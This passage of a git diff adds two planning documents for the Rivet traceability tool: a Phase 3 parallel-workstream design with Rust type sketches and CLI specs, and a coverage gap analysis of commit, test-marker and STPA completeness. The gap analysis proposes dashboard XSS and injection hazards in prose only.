Run `rivet stats` for current counts — do not rely on hardcoded +numbers in documentation as they go stale immediately. ### STPA analysis diff --git a/docs/plans/2026-03-14-phase3-parallel-workstreams-design.md b/docs/plans/2026-03-14-phase3-parallel-workstreams-design.md new file mode 100644 index 0000000..9f12876 --- /dev/null +++ b/docs/plans/2026-03-14-phase3-parallel-workstreams-design.md @@ -0,0 +1,477 @@ +# Phase 3 Parallel Workstreams — Design + +## Goal + +Define 8 independent implementation workstreams that can execute concurrently, +covering SCORE adoption enablement, CLI mutation safety, incremental validation +architecture, formal verification, and build-system integration. + +## Dependency Graph + +``` +W1 (score schema) ──→ W3 (needs.json import) +W6 (MODULE.bazel) ──→ FEAT-044 (build-system providers, future) +W5 (conditional) ──→ salsa migration (future) + +All others are fully independent. +``` + +## Workstreams + +### W1 — SCORE Metamodel Schema (`schemas/score.yaml`) + +**Artifacts:** REQ-025 +**Effort:** Small (1-2 days) +**Unblocks:** W3 + +Translate Eclipse SCORE's public `metamodel.yaml` (50+ need types) into a +Rivet-compatible schema file. Covers SCORE's artifact types: + +- Process types: TSF, workflow, guidance, tool_req +- Requirements: stkh_req, feat_req, comp_req, aou_req +- Architecture: feat, comp, mod (static/dynamic views) +- Implementation: dd_sta, dd_dyn, sw_unit +- Safety: FMEA entries, DFA entries +- Testing: test_spec, test_exec, test_verdict +- Documents: doc, decision_record + +Link types: satisfies, complies, fulfils, implements, belongs_to, consists_of, +uses, violates, mitigated_by, fully_verifies, partially_verifies. + +**Testing:** Validate the schema loads and merges correctly. Integration test +importing a sample `needs.json` from SCORE's public documentation builds. + +**Architecture notes:** The schema file follows the existing mergeable pattern +(`common` + `score`). 
SCORE-specific ID regex patterns (e.g., `stkh_req__*`)
+are expressed as field-level `allowed-values` patterns.
+
+---
+
+### W2 — CLI Mutation Commands
+
+**Artifacts:** REQ-031, DD-028, FEAT-052..056
+**Effort:** Large (1-2 weeks)
+**STPA linkage:** Satisfies SC-1 (validate cross-references), SC-2 (never silently discard)
+
+Six new CLI subcommands with schema-validated write:
+
+```
+rivet add --type <type> --title <title> [--status] [--tags] [--field k=v]...
+rivet modify <id> [--set-status] [--set-title] [--add-tag] [--remove-tag] [--set-field k=v]
+rivet remove <id> [--force]
+rivet link <source-id> --type <link-type> --target <target-id>
+rivet unlink <source-id> --type <link-type> --target <target-id>
+rivet next-id --type <type> | --prefix <prefix>
+```
+
+**Architecture:**
+
+New module `rivet-core/src/mutate.rs` containing:
+
+```rust
+pub struct Mutation {
+    pub kind: MutationKind,
+    pub target_file: PathBuf,
+}
+
+pub enum MutationKind {
+    AddArtifact { artifact: Artifact },
+    ModifyArtifact { id: ArtifactId, changes: Vec<FieldChange> },
+    RemoveArtifact { id: ArtifactId, force: bool },
+    AddLink { source: ArtifactId, link: Link },
+    RemoveLink { source: ArtifactId, link: Link },
+}
+
+pub fn validate_mutation(store: &Store, schema: &Schema, mutation: &Mutation) -> Vec<Diagnostic>;
+pub fn apply_mutation(mutation: &Mutation) -> Result<(), Error>;
+```
+
+Pre-validation checks before any file write:
+- ID uniqueness (add) or existence (modify/remove/link)
+- Type exists in schema
+- Required fields present
+- Status in allowed values
+- Link type valid for source→target type pair
+- Cardinality constraints not violated
+- No orphaned incoming links (remove, unless --force)
+
+File write strategy: YAML append for `add`, targeted string replacement for
+`modify`/`link`/`unlink`, line deletion for `remove`. Preserves comments and
+formatting in existing file content. 
+ +**Testing:** +- Unit tests for `validate_mutation` covering all rejection cases +- Integration tests: add → validate → verify artifact exists +- Integration tests: link → validate → verify link resolved +- Integration tests: remove with incoming links → verify rejection +- proptest: random mutation sequences never produce invalid YAML + +--- + +### W3 — sphinx-needs JSON Import Adapter + +**Artifacts:** REQ-025, DD-020, FEAT-042 +**Effort:** Medium (3-5 days) +**Depends on:** W1 (score schema for type mapping) + +New adapter `rivet-core/src/formats/needs_json.rs`. + +**Architecture:** + +```rust +pub struct NeedsJsonAdapter; + +impl Adapter for NeedsJsonAdapter { + fn import(&self, source: &str, options: &AdapterOptions) -> Result<Vec<Artifact>>; +} + +pub struct NeedsJsonOptions { + pub type_mapping: HashMap<String, String>, // sphinx-needs type → rivet type + pub id_transform: IdTransform, // underscores_to_dashes, etc. + pub field_mapping: HashMap<String, String>, // optional field renaming +} +``` + +needs.json structure (sphinx-needs export): +```json +{ + "current_version": "1.0", + "versions": { + "": { + "needs": { + "stkh_req__automotive_safety": { + "id": "stkh_req__automotive_safety", + "type": "stkh_req", + "title": "Automotive Safety", + "status": "valid", + "links": ["comp_req__safe_compute"], + "links_back": ["feat__safety_monitoring"], + "tags": ["safety"], + ... 
+ } + } + } + } +} +``` + +**Testing:** +- Unit test: parse minimal needs.json with 3-5 needs +- Integration test: import SCORE-style needs.json → validate against score schema +- Round-trip test: import → export as generic YAML → re-import → compare +- Fuzz target: `fuzz_needs_json_import` + +--- + +### W4 — Kani Proof Harnesses + +**Artifacts:** REQ-030, DD-025, FEAT-049 +**Effort:** Medium (3-5 days) +**STPA linkage:** Satisfies SC-14 (proofs verify actual implementation) + +10-15 Kani proof harnesses in `rivet-core/src/proofs/` (or `kani/`): + +| Harness | Target function | Property | +|---------|----------------|----------| +| `proof_parse_artifact_ref` | `parse_artifact_ref()` | No panics for any &str input | +| `proof_schema_merge` | `Schema::merge()` | No panics, all input types preserved | +| `proof_linkgraph_build` | `LinkGraph::build()` | No panics for any valid store+schema | +| `proof_backlink_symmetry` | `LinkGraph::build()` | forward(A→B) implies backward(B←A) | +| `proof_cardinality_check` | `validate()` cardinality | All Cardinality enum arms handled | +| `proof_cycle_detection` | `has_cycles()` | Terminates for graphs up to N nodes | +| `proof_reachable` | `reachable()` | Terminates, result is subset of all nodes | +| `proof_broken_links` | `LinkGraph::build()` | broken set = links with unknown targets | +| `proof_orphan_detection` | `orphans()` | orphans ∩ (has_links ∪ has_backlinks) = ∅ | +| `proof_detect_circular` | `detect_circular_deps()` | DFS terminates for any graph | +| `proof_id_uniqueness` | `Store::insert()` | Duplicate insert returns error | +| `proof_coverage_bounds` | `compute_coverage()` | 0.0 ≤ coverage ≤ 1.0 always | + +**CI integration:** New GitHub Actions job: +```yaml +kani: + runs-on: ubuntu-latest + steps: + - uses: model-checking/kani-github-action@v1 + - run: cargo kani --tests -p rivet-core +``` + +**Testing:** The harnesses ARE the tests. 
Kani verification replaces +traditional assertions with exhaustive bounded checking. + +--- + +### W5 — Conditional Validation Rules + +**Artifacts:** REQ-023, DD-018, FEAT-040, FEAT-048 +**Effort:** Medium (3-5 days) +**STPA linkage:** Satisfies SC-12 (verify rule consistency before applying) + +**Schema extension:** + +```yaml +# In schema YAML +conditional-rules: + - name: approved-requires-verification-criteria + description: Approved requirements must have verification criteria + when: + field: status + equals: approved + then: + required-fields: [verification-criteria] + severity: error + + - name: asil-requires-mitigation + when: + field: safety + matches: "ASIL_.*" + then: + required-links: [mitigated_by] + severity: error +``` + +**Architecture:** + +New types in `schema.rs`: +```rust +pub struct ConditionalRule { + pub name: String, + pub description: Option<String>, + pub when: Condition, + pub then: Requirement, + pub severity: Severity, +} + +pub enum Condition { + Equals { field: String, value: String }, + Matches { field: String, pattern: String }, + Exists { field: String }, + Not(Box<Condition>), + All(Vec<Condition>), + Any(Vec<Condition>), +} + +pub enum Requirement { + RequiredFields(Vec<String>), + RequiredLinks(Vec<String>), + ForbiddenFields(Vec<String>), + All(Vec<Requirement>), +} +``` + +**Consistency check at schema load time (SC-12):** +```rust +pub fn check_rule_consistency(rules: &[ConditionalRule]) -> Vec<Diagnostic> { + // For each pair of rules that can co-fire on the same artifact: + // Check that their requirements don't contradict + // (e.g., one requires field X, another forbids field X) +} +``` + +**Testing:** +- Unit tests: each Condition variant matches/doesn't match +- Unit tests: each Requirement variant validates/rejects +- Integration test: conditional rule catches missing verification-criteria +- Integration test: contradictory rules detected at schema load time +- proptest: random rule + random artifact → deterministic 
result +- Kani harness: `proof_condition_eval` — no panics for any field values + +--- + +### W6 — MODULE.bazel rowan Parser + +**Artifacts:** REQ-028, DD-023, FEAT-046 +**Effort:** Medium (3-5 days) +**STPA linkage:** Satisfies SC-13 (reject unrecognized constructs with diagnostics) + +**Architecture:** + +New module `rivet-core/src/formats/starlark.rs` (or separate crate `rivet-starlark`): + +```rust +#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] +#[repr(u16)] +pub enum SyntaxKind { + // Tokens + Whitespace, Comment, Newline, + LParen, RParen, LBracket, RBracket, + Comma, Equals, Colon, Dot, + String, Integer, True, False, None, + Ident, + // Composite nodes + Root, + FunctionCall, // module(), bazel_dep(), git_override() + ArgumentList, + KeywordArgument, // name = "value" + ListExpr, // ["a", "b"] + // Error + Error, +} +``` + +Supported function calls (MODULE.bazel subset): +- `module(name, version, ...)` +- `bazel_dep(name, version, dev_dependency, ...)` +- `git_override(module_name, remote, commit, ...)` +- `archive_override(module_name, urls, strip_prefix, integrity, ...)` +- `local_path_override(module_name, path)` +- `single_version_override(module_name, version, ...)` + +Unsupported constructs emit `SyntaxKind::Error` with diagnostic span: +- `load()` statements +- Variable assignments +- String concatenation +- `if` / `for` expressions +- Function definitions + +**HIR extraction:** + +```rust +pub struct BazelModule { + pub name: String, + pub version: String, + pub deps: Vec<BazelDep>, + pub overrides: Vec<Override>, + pub diagnostics: Vec<Diagnostic>, +} + +pub struct BazelDep { + pub name: String, + pub version: String, + pub dev_dependency: bool, +} + +pub enum Override { + Git { module_name: String, remote: String, commit: String }, + Archive { module_name: String, urls: Vec<String>, integrity: Option<String> }, + LocalPath { module_name: String, path: String }, +} +``` + +**Testing:** +- Unit tests: lex each token type +- Unit tests: parse 
each function call type +- Unit tests: error recovery on malformed input +- Integration test: parse real MODULE.bazel from eclipse-score/score +- Fuzz target: `fuzz_starlark_parse` +- Kani harness: `proof_starlark_parse` — no panics for any byte input + +--- + +### W7 — Change Impact Analysis (`rivet impact`) + +**Artifacts:** REQ-024, DD-019, FEAT-041 +**Effort:** Medium (3-5 days) + +**Architecture:** + +```rust +// In rivet-core/src/impact.rs +pub struct ImpactAnalysis { + pub changed: Vec<ArtifactId>, // directly changed + pub directly_affected: Vec<ArtifactId>, // depth 1 + pub transitively_affected: Vec<ArtifactId>, // depth 2+ +} + +pub fn compute_impact( + current: &Store, + baseline: &Store, + graph: &LinkGraph, +) -> ImpactAnalysis { + let diff = compute_diff(current, baseline); + let changed_ids: Vec<_> = diff.added.iter() + .chain(diff.modified.iter()) + .chain(diff.removed.iter()) + .collect(); + // Walk link graph from each changed node + // Collect transitively reachable artifacts +} +``` + +Content hashing for baseline comparison: +```rust +pub fn content_hash(artifact: &Artifact) -> u64 { + // Hash title + description + status + fields + links + // Deterministic, ignores formatting +} +``` + +**CLI:** `rivet impact --since <commit|tag> [--format json] [--depth N]` + +**Testing:** +- Unit test: unchanged store → empty impact set +- Unit test: one artifact changed → correct transitive set +- Integration test: modify REQ → verify downstream DD and FEAT in impact set +- proptest: impact set is always a subset of all artifacts + +--- + +### W8 — Test-to-Requirement Source Scanner + +**Artifacts:** REQ-026, DD-021, FEAT-043 +**Effort:** Medium (3-5 days) + +**Architecture:** + +```rust +// In rivet-core/src/test_scanner.rs +pub struct TestMarker { + pub test_name: String, + pub file: PathBuf, + pub line: usize, + pub link_type: String, // "verifies", "partially-verifies" + pub target_id: ArtifactId, +} + +pub fn scan_source_files(paths: &[PathBuf], 
patterns: &[MarkerPattern]) -> Vec<TestMarker>; + +pub struct MarkerPattern { + pub language: String, // "rust", "python", "generic" + pub regex: Regex, +} +``` + +Default patterns: +- Rust: `// rivet: (verifies|partially-verifies) ([\w-]+)` +- Rust attribute: `#\[rivet::(verifies|partially_verifies)\("([\w-]+)"\)\]` +- Python: `# rivet: (verifies|partially-verifies) ([\w-]+)` +- Python decorator: `@rivet_(verifies|partially_verifies)\("([\w-]+)"\)` + +Ephemeral injection (same pattern as commits.rs): +```rust +pub fn inject_test_nodes(graph: &mut LinkGraph, markers: &[TestMarker]) { + // Add ephemeral test nodes linked to referenced artifacts +} +``` + +**CLI:** `rivet coverage --tests [--scan-paths src/ tests/]` + +**Testing:** +- Unit test: each marker pattern matches expected formats +- Unit test: scan Rust file with `// rivet: verifies REQ-001` +- Integration test: scan → inject → coverage shows test coverage +- Fuzz target: `fuzz_marker_scan` + +--- + +## Cross-Cutting Concerns + +### Documentation updates needed + +Each workstream must update the built-in docs (`rivet docs`): +- W2: New topic `mutation` covering add/modify/remove/link/unlink commands +- W3: Update topic `adapters` with needs-json adapter documentation +- W5: New topic `conditional-rules` with schema syntax and examples +- W6: New topic `build-system-integration` covering MODULE.bazel discovery +- W7: New topic `impact-analysis` covering the impact command +- W8: New topic `test-traceability` covering marker syntax per language + +### CI pipeline additions + +- W4: New `kani` job +- All: Existing test/clippy/fmt jobs cover new code automatically + +### STPA coverage + +New UCAs (UCA-C-10..C-17) and controller constraints (CC-C-10..C-17) cover +the safety-relevant workstreams (W2, W5, W6). Existing STPA analysis covers +W3 (adapter UCAs) and W7/W8 (core engine UCAs). 
diff --git a/docs/plans/2026-03-16-coverage-gap-analysis.md b/docs/plans/2026-03-16-coverage-gap-analysis.md new file mode 100644 index 0000000..d1a496d --- /dev/null +++ b/docs/plans/2026-03-16-coverage-gap-analysis.md @@ -0,0 +1,444 @@ +# Coverage Gap Analysis: STPA, Commits, and Test Traceability + +**Date:** 2026-03-16 +**Scope:** Rivet v0.2.0 — comprehensive gap analysis across commit traceability, +test coverage, STPA completeness, and lifecycle traceability. + +--- + +## Executive Summary + +| Metric | Current | Target | Gap | +|--------|---------|--------|-----| +| Commit coverage | 11.1% (10/90) | 50%+ | 80 artifacts uncovered | +| Test traceability markers | 0 source markers | 31 REQ markers | No `// rivet: verifies` annotations exist | +| STPA loss scenarios | 19 scenarios | ~27 needed | 8 UCAs lack loss scenarios (UCA-C-10 through UCA-C-17) | +| Lifecycle coverage gaps | 44 artifacts | 0 | Missing downstream links on approved artifacts | +| Validation warnings | 2 | 0 | FEAT-050/051 use `phase-4` (not in allowed values) | +| Schema coverage rules | 100% (all 10 rules) | 100% | Link-level coverage is complete | + +--- + +## Part 1: Commit Coverage Gap + +### Current State + +`rivet commits` reports **11.1% artifact coverage** (10/90 traceable artifacts). 
+ +- **Linked commits:** 1 +- **Orphan commits:** 23 (no artifact trailers) +- **Exempt commits:** 13 +- **Broken refs:** 0 + +### Artifacts Without Commit Coverage (80 total) + +#### Requirements (12 uncovered out of 31) + +| ID | Title | Status | Notes | +|----|-------|--------|-------| +| REQ-020 | Cross-repository artifact linking | draft | Phase 3 — not yet implemented | +| REQ-021 | Distributed baselining | draft | Phase 3 | +| REQ-022 | Single-binary WASM asset embedding | draft | Phase 3 | +| REQ-023 | Conditional validation rules | draft | Phase 3 | +| REQ-024 | Change impact analysis | draft | Phase 3 | +| REQ-025 | sphinx-needs JSON import | draft | Phase 3 | +| REQ-026 | Test-to-requirement traceability extraction | draft | Phase 3 | +| REQ-027 | Build-system-aware cross-repo discovery | draft | Phase 3 | +| REQ-028 | Diagnostic-quality parsing with lossless syntax trees | draft | Phase 3 | +| REQ-029 | Incremental validation via dependency-tracked computation | draft | Phase 3 | +| REQ-030 | Formal correctness guarantees | draft | Phase 3-4 | +| REQ-031 | Schema-validated artifact mutation from CLI | draft | Phase 3 | + +**Analysis:** All 12 uncovered REQs are draft/Phase 3+. The 19 approved REQs +also lack commit coverage because commits predate the trailer system. This is +the biggest gap — retroactively tagging existing commits is not practical. + +#### Design Decisions (15 uncovered out of 28) + +DD-014 through DD-028 — all Phase 3 decisions with no implementing commits yet. + +#### Features (25 uncovered out of 67) + +FEAT-033 through FEAT-057 — all draft/Phase 3 features awaiting implementation. 
+ +#### STPA Artifacts (28 uncovered) + +- H-9, H-10, H-11, H-12 and sub-hazards (8 total) — added in Phase 2.5 +- SC-11 through SC-14 (4 total) — added in Phase 2.5 +- UCA-C-10 through UCA-C-17 (8 total) — added in Phase 2.5 +- CC-C-10 through CC-C-17 (8 total) — added in Phase 2.5 + +### Path from 11.1% to 50%+ + +**Strategy 1: Tag future commits (organic growth)** +- Each Phase 3 implementation commit should reference its REQ/FEAT/DD. +- With 8 parallel workstreams, 5-10 tagged commits per workstream would cover + ~40-80 artifacts, reaching 50%+ within one sprint. + +**Strategy 2: Retroactive coverage for approved artifacts** +- The 19 approved REQs and ~30 approved FEATs implemented in Phase 1-2 have + implementing commits but those commits lack trailers. +- Option A: Create one `chore: retroactive traceability tagging` commit per + artifact batch (e.g., all Phase 1 REQs) with Implements trailers. +- Option B: Add the implementing commit SHAs to the artifact YAML as a + `commits` field — but this is not how `rivet commits` works (it scans git log). +- **Recommended:** Accept that Phase 1-2 commits are organically unlinked. + Focus enforcement on Phase 3+ commits. The `rivet commit-msg-check` hook + (FEAT-029) will prevent future orphans. + +**Strategy 3: Reduce the denominator** +- STPA artifacts (hazards, UCAs, controller-constraints, loss-scenarios) are + safety analysis — they don't have "implementing commits" in the traditional + sense. Consider adding them to `trace-exempt-artifacts` in rivet.yaml. +- If 28 STPA artifacts are exempted, the denominator drops from 90 to 62, + and achieving 50% requires covering ~31 artifacts. + +**Projected coverage with Phase 3 discipline:** +- Phase 3 has ~25 FEATs + ~12 REQs + ~15 DDs to implement = ~52 artifacts. 
+- If each gets 1+ tagged commit: (10 + 52) / 90 = **68.9%** +- With STPA exemptions: (10 + 52) / 62 = **100%** + +--- + +## Part 2: Test Coverage Gap + +### Current State + +`rivet coverage` reports **100%** on all 10 schema-level coverage rules. +This means every requirement has a feature satisfying it, every hazard has +a constraint, every UCA has a controller constraint, etc. + +However, **zero source-level test traceability markers** exist. A grep for +`rivet: verifies` across rivet-core/src/ and rivet-core/tests/ returned +no results. + +### Test Files and What They Cover + +| Test File | Tests | Effective REQ Coverage | +|-----------|-------|----------------------| +| rivet-core/src/diff.rs | 5 unit tests | REQ-001 (store diffs) | +| rivet-core/src/lifecycle.rs | 4 unit tests | REQ-004 (validation lifecycle) | +| rivet-core/src/document.rs | 8 unit tests | REQ-001, REQ-007 (document system) | +| rivet-core/tests/integration.rs | ~18 integration tests | REQ-001, REQ-003, REQ-004, REQ-007, REQ-010 | +| rivet-core/tests/stpa_roundtrip.rs | ~4 tests | REQ-002 (STPA) | +| rivet-core/tests/proptest_core.rs | 6 proptest properties | REQ-001, REQ-004, REQ-010 | +| rivet-core/tests/oslc_integration.rs | ~2 tests | REQ-006 (OSLC) | +| rivet-core/tests/docs_schema.rs | ~2 tests | REQ-007 (docs) | +| rivet-core/tests/commits_integration.rs | ~4 tests | REQ-017, REQ-018, REQ-019 | +| rivet-core/tests/commits_config.rs | ~3 tests | REQ-017 (config parsing) | +| rivet-core/tests/externals_config.rs | ~3 tests | REQ-020 (cross-repo) | +| rivet-core/tests/mutate_integration.rs | ~8 tests | REQ-031 (mutations) | + +### Requirements With Tests But No Markers + +These requirements have tests that exercise them, but the tests lack +`// rivet: verifies REQ-XXX` annotations: + +- **REQ-001** — Store/model unit tests (diff.rs, document.rs, integration.rs) +- **REQ-002** — STPA roundtrip tests +- **REQ-003** — Integration tests (ASPICE rules) +- **REQ-004** — Link graph tests, 
proptest, integration +- **REQ-005** — ReqIF integration tests (stub) +- **REQ-007** — Document and CLI integration tests +- **REQ-010** — Schema merge tests, proptest +- **REQ-014** — All TEST-* artifacts verify this +- **REQ-017** — commits_integration.rs, commits_config.rs +- **REQ-018** — commits_integration.rs (commit-msg-check) +- **REQ-019** — commits_integration.rs (orphan detection) +- **REQ-020** — externals_config.rs +- **REQ-031** — mutate_integration.rs + +### Requirements Without Any Tests + +| REQ | Title | Notes | +|-----|-------|-------| +| REQ-006 | OSLC sync | Only stub test, OSLC not implemented | +| REQ-008 | WASM adapters | No WASM runtime tests | +| REQ-009 | Test results as evidence | TEST-010 covers the model, not the release flow | +| REQ-011 | Rust edition 2024 / MSRV | Checked by CI, not unit tested | +| REQ-012 | CI quality gates | Meta-requirement, verified by CI pipeline | +| REQ-013 | Performance benchmarks | Benchmarks exist but not traced | +| REQ-015 | ASPICE 4.0 schemas | Schema tests exist, no marker | +| REQ-016 | Cybersecurity schema | Schema merge tests cover it | +| REQ-021 through REQ-030 | Phase 3 requirements | Not yet implemented | + +### Recommendations + +1. **Add `// rivet: verifies REQ-XXX` markers** to existing test functions. + This requires implementing FEAT-043 (test traceability source scanner) first, + or manually adding markers now in preparation. + +2. **Marker format to adopt** (per FEAT-043 design): + ```rust + // rivet: verifies REQ-001 + #[test] + fn test_store_insert_lookup() { ... } + ``` + +3. **Priority order for adding markers:** + - Phase 1: All integration tests in `tests/integration.rs` (~18 tests) + - Phase 2: Proptest properties in `tests/proptest_core.rs` (6 tests) + - Phase 3: Unit tests in `src/diff.rs`, `src/document.rs`, `src/lifecycle.rs` + - Phase 4: Specialized tests (stpa_roundtrip, commits, externals, mutate) + +4. 
**Estimated coverage after markers:** 13/31 REQs with direct test markers + (42%). Adding markers to existing tests for REQ-015, REQ-016 would reach + 15/31 (48%). + +--- + +## Part 3: STPA Completeness + +### 3.1 Missing Hazards for Recent Features + +The following features added in Phase 2/2.5 have **no corresponding STPA hazards**: + +#### HTML Export Corruption +The dashboard generates HTML for compliance evidence viewing. If the HTML +export contains corrupted data (XSS in artifact fields rendered as HTML, +broken link graphs, missing artifacts from the export), auditors receive +misleading evidence. + +**Proposed hazard:** +- **H-13: Rivet dashboard renders artifact content as unescaped HTML, enabling + XSS or content injection in compliance evidence** + - Losses: [L-2, L-3] — compliance evidence corruption and data sovereignty + - This is particularly relevant because the dashboard renders artifact + descriptions as HTML and serves as audit evidence (SC-6 applies) + +#### config.js Injection +The dashboard serves a dynamically generated `config.js` that bootstraps +client-side behavior (WebSocket URLs, feature flags). If this is injectable, +an attacker could redirect the dashboard to exfiltrate artifact data. + +**Proposed hazard:** +- **H-14: Rivet dashboard config.js endpoint is injectable, allowing artifact + data exfiltration or UI manipulation** + - Losses: [L-3, L-6] — data sovereignty and audit trail + +#### WASM Runtime Panics +The spar WASM rendering module runs in the dashboard to render AADL diagrams. +If the WASM module panics on malformed AADL input, it could crash the browser +tab or produce an incomplete rendering that masks architecture gaps. 
+ +**Proposed hazard:** +- **H-15: Rivet WASM renderer panics on malformed AADL input, producing + incomplete architecture diagrams** + - Losses: [L-1, L-4] — traceability integrity (missing components in diagram) + and engineering productivity (crashed browser tab) + +### 3.2 System Constraint to Requirement Linkage + +All 14 system constraints are linked to hazards (verified by `rivet coverage`). + +Cross-referencing SCs to REQs: + +| SC | Hazard | Linked to REQ? | Notes | +|----|--------|---------------|-------| +| SC-1 | H-1 | REQ-031 (via links) | Yes | +| SC-2 | H-2 | REQ-031 (via links) | Yes | +| SC-3 | H-3 | No direct REQ link | Should link to REQ-004 | +| SC-4 | H-4 | No direct REQ link | Should link to REQ-005, REQ-006 | +| SC-5 | H-5 | No direct REQ link | Should link to REQ-006 | +| SC-6 | H-6 | No direct REQ link | **Gap** — no REQ for report verification gating | +| SC-7 | H-7 | No direct REQ link | Should link to REQ-017 | +| SC-8 | H-8 | No direct REQ link | Should link to REQ-006 | +| SC-9 | H-4 | No direct REQ link | Should link to REQ-005 | +| SC-10 | H-1, H-3 | No direct REQ link | Should link to REQ-020 | +| SC-11 | H-9 | REQ-029 (via links) | Yes | +| SC-12 | H-10 | REQ-023 (via links) | Yes | +| SC-13 | H-11 | REQ-028 (via links) | Yes | +| SC-14 | H-12 | REQ-030 (via links) | Yes | + +**Gap:** SC-3 through SC-10 have no `satisfies` link from any requirement. +The constraints exist but no requirement explicitly commits to satisfying them. + +### 3.3 UCA to Hazard Linkage + +All 45 UCAs are linked to hazards (100% coverage per `rivet coverage`). No gaps. + +### 3.4 Loss Scenarios for UCA-C-10 through UCA-C-17 + +**Current state:** The loss-scenarios.yaml has 19 scenarios. UCA-C-10 through +UCA-C-17 (the incremental validation and parser UCAs added in Phase 2.5) have +**zero loss scenarios**. This is a significant STPA completeness gap. 
+ +**Missing loss scenarios (8 needed):** + +| UCA | Description | Proposed Loss Scenario | +|-----|-------------|----------------------| +| UCA-C-10 | Salsa doesn't invalidate on file change | LS-C-5: Developer edits YAML, `rivet validate` returns cached PASS from salsa, new validation error is missed. Developer merges broken traceability. | +| UCA-C-11 | Conditional rules not re-evaluated on field change | LS-C-6: Artifact status changes from draft to approved, conditional rule requiring verification-criteria doesn't fire, approved artifact ships without verification evidence. | +| UCA-C-12 | Contradictory conditional rules applied | LS-C-7: Schema update adds rule A requiring field X when status=approved, existing rule B forbids field X when safety=ASIL_B. Engineers cannot make ASIL_B approved artifacts valid, disable validation entirely. | +| UCA-C-13 | Incremental != full validation results | LS-C-8: After a sequence of edits, incremental validation reports PASS. A colleague runs full validation on the same files and gets 3 errors. Trust in the tool collapses, team abandons automated validation. | +| UCA-C-14 | Conditional rules evaluated before schema loads | LS-C-9: Schema file with 5 conditional rules is loaded after validation begins. Only 2 of 5 rules apply. Safety-critical field requirements from the remaining 3 rules are never checked. | +| UCA-C-15 | Parser misses git_override | LS-C-10: MODULE.bazel pins dependency to a specific commit via git_override, but parser extracts registry version. Cross-repo validation runs against wrong commit, reports coverage for artifacts that don't exist in the pinned version. | +| UCA-C-16 | Parser silently skips unsupported Starlark | LS-C-11: MODULE.bazel uses load() to import a macro that declares 5 dependencies. Parser silently skips load(), missing all 5 repos. Cross-repo validation has blind spots for 5 modules. 
|
+| UCA-C-17 | Parser extracts wrong module name | LS-C-12: Parser bug swaps name= and version= keyword values in bazel_dep(). Cross-repo links resolve against "1.2.3" (the version string used as module name), which doesn't exist, but the error message is confusing. |
+
+### 3.5 HTML Export Controller
+
+The dashboard (`CTRL-DASH`) is currently modeled as a read-only display
+controller. However, the HTML it serves is **de facto compliance evidence** —
+auditors view the dashboard to verify traceability coverage. SC-6 states:
+
+> "Rivet must generate compliance reports only from verified traceability data."
+
+The dashboard currently has no validation gate — it renders whatever data is
+loaded, whether validated or not. This means:
+
+**Proposed controller extension:** Add control actions to CTRL-DASH:
+- **CA-DASH-2:** Render compliance-grade HTML pages (coverage matrix, validation
+  summary, artifact detail pages used as audit evidence)
+- **CA-DASH-3:** Export static HTML snapshots for offline audit review
+
+**Proposed UCAs for export controller:**
+- **UCA-D-3:** Dashboard exports compliance HTML without running validation
+  first (hazards: H-6, H-3)
+- **UCA-D-4:** Dashboard exports HTML containing unescaped artifact content
+  that renders as executable JavaScript (hazards: H-13)
+- **UCA-D-5:** Dashboard exports HTML snapshot that omits artifacts from
+  partially-loaded sources (hazards: H-2, H-3)
+
+---
+
+## Part 4: Artifact Inventory for v0.2.0
+
+### New STPA Artifacts Needed
+
+#### Hazards (3 new)
+
+| ID | Title | Losses |
+|----|-------|--------|
+| H-13 | Dashboard renders unescaped HTML content in compliance evidence | L-2, L-3 |
+| H-14 | Dashboard config.js endpoint is injectable | L-3, L-6 |
+| H-15 | WASM renderer panics on malformed input, producing incomplete diagrams | L-1, L-4 |
+
+#### System Constraints (3 new)
+
+| ID | Title | Hazards |
+|----|-------|---------|
+| SC-15 | Dashboard must HTML-escape all artifact content before 
rendering | H-13 | +| SC-16 | Dashboard must sanitize all dynamically generated JavaScript | H-14 | +| SC-17 | WASM renderers must trap panics and return error SVGs, never crash | H-15 | + +#### UCAs (3 new for dashboard export) + +| ID | Controller | Description | Hazards | +|----|-----------|-------------|---------| +| UCA-D-3 | CTRL-DASH | Dashboard exports compliance HTML without validation gate | H-6, H-3 | +| UCA-D-4 | CTRL-DASH | Dashboard renders unescaped content as executable HTML | H-13 | +| UCA-D-5 | CTRL-DASH | Dashboard exports partial data from incomplete source loading | H-2, H-3 | + +#### Controller Constraints (3 new) + +| ID | Constraint | UCAs | +|----|-----------|------| +| CC-D-3 | Dashboard must gate compliance-grade pages on successful validation | UCA-D-3 | +| CC-D-4 | Dashboard must HTML-escape all artifact-sourced content | UCA-D-4 | +| CC-D-5 | Dashboard must verify all sources loaded before generating export | UCA-D-5 | + +#### Loss Scenarios (8 new for incremental/parser UCAs + 3 for dashboard) + +| ID | Title | UCA | +|----|-------|-----| +| LS-C-5 | Salsa cache returns stale validation pass after file edit | UCA-C-10 | +| LS-C-6 | Conditional rule misses status change to approved | UCA-C-11 | +| LS-C-7 | Contradictory rules make ASIL_B approval impossible | UCA-C-12 | +| LS-C-8 | Incremental/full validation divergence erodes tool trust | UCA-C-13 | +| LS-C-9 | Schema loads after validation, missing conditional rules | UCA-C-14 | +| LS-C-10 | Parser misses git_override, validates wrong commit | UCA-C-15 | +| LS-C-11 | Parser silently skips load(), missing 5 dependencies | UCA-C-16 | +| LS-C-12 | Parser swaps keyword args, resolves wrong module | UCA-C-17 | +| LS-D-1 | Dashboard shows green metrics without validation gate | UCA-D-3 | +| LS-D-2 | XSS in artifact description executes in auditor's browser | UCA-D-4 | +| LS-D-3 | HTML export omits STPA artifacts from unmounted source | UCA-D-5 | + +### Missing Test Traceability Markers + 
+
+**Immediate action (no code change needed, just comments):**
+
+Add `// rivet: verifies REQ-XXX` to these test files:
+
+| File | Tests | Markers to Add |
+|------|-------|---------------|
+| rivet-core/tests/integration.rs | 18 tests | REQ-001, REQ-003, REQ-004, REQ-007, REQ-010 |
+| rivet-core/tests/proptest_core.rs | 6 tests | REQ-001, REQ-004, REQ-010 |
+| rivet-core/tests/stpa_roundtrip.rs | 4 tests | REQ-002, REQ-004 |
+| rivet-core/src/diff.rs | 5 tests | REQ-001 |
+| rivet-core/src/document.rs | 8 tests | REQ-001, REQ-007 |
+| rivet-core/src/lifecycle.rs | 4 tests | REQ-004 |
+| rivet-core/tests/commits_integration.rs | 4 tests | REQ-017, REQ-018, REQ-019 |
+| rivet-core/tests/commits_config.rs | 3 tests | REQ-017 |
+| rivet-core/tests/externals_config.rs | 3 tests | REQ-020 |
